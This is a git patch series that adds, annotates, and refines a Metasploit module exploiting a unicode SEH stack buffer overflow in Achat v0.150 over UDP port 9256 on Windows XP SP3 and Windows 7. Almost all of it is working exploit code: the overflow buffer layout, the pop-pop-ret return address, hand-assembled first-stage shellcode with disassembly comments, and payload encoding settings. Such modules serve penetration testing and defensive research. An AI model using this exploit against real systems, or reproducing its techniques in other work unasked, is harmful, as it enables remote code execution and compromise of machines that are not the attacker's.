From 64ab11c6ba3938d05f72cc8fea6c3287eb72268c Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Thu, 29 Jan 2015 23:20:31 +0100 Subject: [PATCH 1/7] Add Achat Beta v0.150 RCE for Win7/XPSP3 --- modules/exploits/windows/misc/achat_beta.rb | 101 ++++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 modules/exploits/windows/misc/achat_beta.rb diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb new file mode 100644 index 0000000000..d20f21bdc9 --- /dev/null +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -0,0 +1,101 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Achat Beta v0.150 Buffer Overflow', + 'Description' => %q{ + This module exploits a SEH based unicode stack buffer overflow in Achat v0.150, + by sending a crafted message to the default harcoded port 9256. The message + overflows the stack and overwrites the SEH handler. The exploit is reliable, but + depends of timing. It has two distinct threads that are overflowing the stack in + the same time. Tested on Windows XP SP3 and Windows 7. + The overflow was found by Peter Kasza. + }, + 'Author' => + [ + 'Balazs Bucsay ', # Exploit, Metasploit module + 'Peter Kasza ' # Vulnerability discovery + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 730, +# 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), + 'StackAdjustment' => -3500, + 'EncoderOptions' => + { + 'BufferRegister' => 'EAX', + } + + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested OK Windows XP SP3, Windows 7 + # Not working on Windows Server 2003 + [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe + ], + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 18 2014')) + + register_options( + [ + Opt::RPORT(9256), + ], self.class) + end + + def exploit + connect_udp + + firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" + encoder = framework.encoders.create('x86/unicode_mixed') + encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) + payloadencoded = encoder.encode(payload.raw, nil, nil, platform) + + sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" + sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) + sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset + sploit << "\x61\x40" # POPAD + INC EAX + + sploit << target.ret # AChat.exe p/p/r address + # adjusting the first thread's unicode payload, tricky asm-fu + sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" + sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread + sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX + sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload + sploit << "\x00" + "A"*10 + "\x00" + + + i = 0 + while i < sploit.length do + if i > 172000 + sleep(1.0) + end + udp_sock.put(sploit[i..i+8192-1]) + i += 8192 + end + + disconnect_udp + end + +end From 9891026d309b1d738142b166e4289ceb5fe6665d Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Mon, 9 Feb 2015 22:33:41 +0100 Subject: [PATCH 2/7] sleep changed to Rex::sleep --- modules/exploits/windows/misc/achat_beta.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index d20f21bdc9..7a3ae5c309 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote i = 0 while i < sploit.length do if i > 172000 - sleep(1.0) + Rex::sleep(1.0) end udp_sock.put(sploit[i..i+8192-1]) i += 8192 From c7880ab4e15f08caed7d465ed49a0aa0133196a5 Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Mon, 9 Feb 2015 23:21:38 +0100 Subject: [PATCH 3/7] hex strings related explanations --- modules/exploits/windows/misc/achat_beta.rb | 35 +++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index 7a3ae5c309..9ce82d1951 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -67,6 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_udp + # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding + # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding + # 55 PUSH EBP # ebp holds a close pointer to the payload + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 58 POP EAX # mov eax, ebp + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 05 00140011 ADD EAX,11001400 # adjusting eax + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 50 PUSH EAX # eax points to the start of the shellcode + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 58 POP EAX # padding + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 59 POP ECX # padding + # 0039 ADD BYTE PTR DS:[ECX],BH # padding firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" encoder = framework.encoders.create('x86/unicode_mixed') encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) @@ -78,7 +94,26 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address + # adjusting the first thread's unicode payload, tricky asm-fu + # the first seh exception jumps here, firststage variable will be executed + # by the second seh exception as well. It needs to be in sync with the second + # thread, so that is why we adjust eax/ebp to have a close pointer to the + # payload, then firststage variable will take the rest of the job. + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 55 PUSH EBP # ebp with close pointer to payload + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 58 POP EAX # put ebp to eax + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place + # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more + # 05 00140011 ADD EAX,11001400 # more adjusting + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 50 PUSH EAX # saving eax + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX From ac6879cfe165bc3ad8e8b719524200fa8014da60 Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Mon, 9 Feb 2015 23:36:35 +0100 Subject: [PATCH 4/7] proper payload encoding from now on --- modules/exploits/windows/misc/achat_beta.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index 9ce82d1951..beb4d4d8f9 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Achat Beta v0.150 Buffer Overflow', + 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits a SEH based unicode stack buffer overflow in Achat v0.150, by sending a crafted message to the default harcoded port 9256. The message @@ -38,9 +38,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { + 'DisableNops' => true, 'Space' => 730, -# 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), + 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, + 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX', @@ -84,9 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" - encoder = framework.encoders.create('x86/unicode_mixed') - encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) - payloadencoded = encoder.encode(payload.raw, nil, nil, platform) sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) @@ -117,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX - sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload + sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload sploit << "\x00" + "A"*10 + "\x00" From 86f3bcad113e79128511907e8f836012f838644e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Feb 2015 17:33:05 -0600 Subject: [PATCH 5/7] Do minor cleanup --- modules/exploits/windows/misc/achat_beta.rb | 52 ++++++++++----------- 1 file changed, 24 insertions(+), 28 deletions(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index beb4d4d8f9..312dfedd08 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -15,17 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ - This module exploits a SEH based unicode stack buffer overflow in Achat v0.150, - by sending a crafted message to the default harcoded port 9256. The message - overflows the stack and overwrites the SEH handler. The exploit is reliable, but - depends of timing. It has two distinct threads that are overflowing the stack in - the same time. Tested on Windows XP SP3 and Windows 7. - The overflow was found by Peter Kasza. + This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By + sending a crafted message to the default port 9256 it's possible to overwrites the + SEH handler. Even when the exploit is reliable it depends of timing since there are + two threads overflowing the stack in the same time. This module has been tested on + Windows XP SP3 and Windows 7. }, 'Author' => [ - 'Balazs Bucsay ', # Exploit, Metasploit module - 'Peter Kasza ' # Vulnerability discovery + 'Peter Kasza ', # Vulnerability discovery + 'Balazs Bucsay ' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => @@ -45,16 +44,15 @@ class Metasploit3 < Msf::Exploit::Remote 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { - 'BufferRegister' => 'EAX', + 'BufferRegister' => 'EAX' } - }, 'Platform' => 'win', 'Targets' => [ - # Tested OK Windows XP SP3, Windows 7 - # Not working on Windows Server 2003 - [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe + # Tested OK Windows XP SP3, Windows 7 + # Not working on Windows Server 2003 + [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, @@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - Opt::RPORT(9256), + Opt::RPORT(9256) ], self.class) end @@ -85,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding - firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" + first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" - sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" - sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) - sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset + sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" + sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) + sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu - # the first seh exception jumps here, firststage variable will be executed + # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the - # payload, then firststage variable will take the rest of the job. + # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding @@ -113,22 +111,20 @@ class Metasploit3 < Msf::Exploit::Remote # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax - sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" + sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread - sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX - sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload - sploit << "\x00" + "A"*10 + "\x00" - + sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX + sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload + sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end - udp_sock.put(sploit[i..i+8192-1]) - i += 8192 + sent = udp_sock.put(sploit[i..i + 8192 - 1]) + i += sent end - disconnect_udp end From eb0741d7a76096d7c2333538f7bf1ec0fa46313d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Feb 2015 17:39:18 -0600 Subject: [PATCH 6/7] Modify reference --- modules/exploits/windows/misc/achat_beta.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index 312dfedd08..e74499e98e 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'], + ['CWE', '121'], ], 'DefaultOptions' => { From 6165d623ff149cf8a4571c94c73404d70a1bd649 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Feb 2015 17:39:55 -0600 Subject: [PATCH 7/7] Change module filename --- modules/exploits/windows/misc/{achat_beta.rb => achat_bof.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/misc/{achat_beta.rb => achat_bof.rb} (100%) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_bof.rb similarity index 100% rename from modules/exploits/windows/misc/achat_beta.rb rename to modules/exploits/windows/misc/achat_bof.rb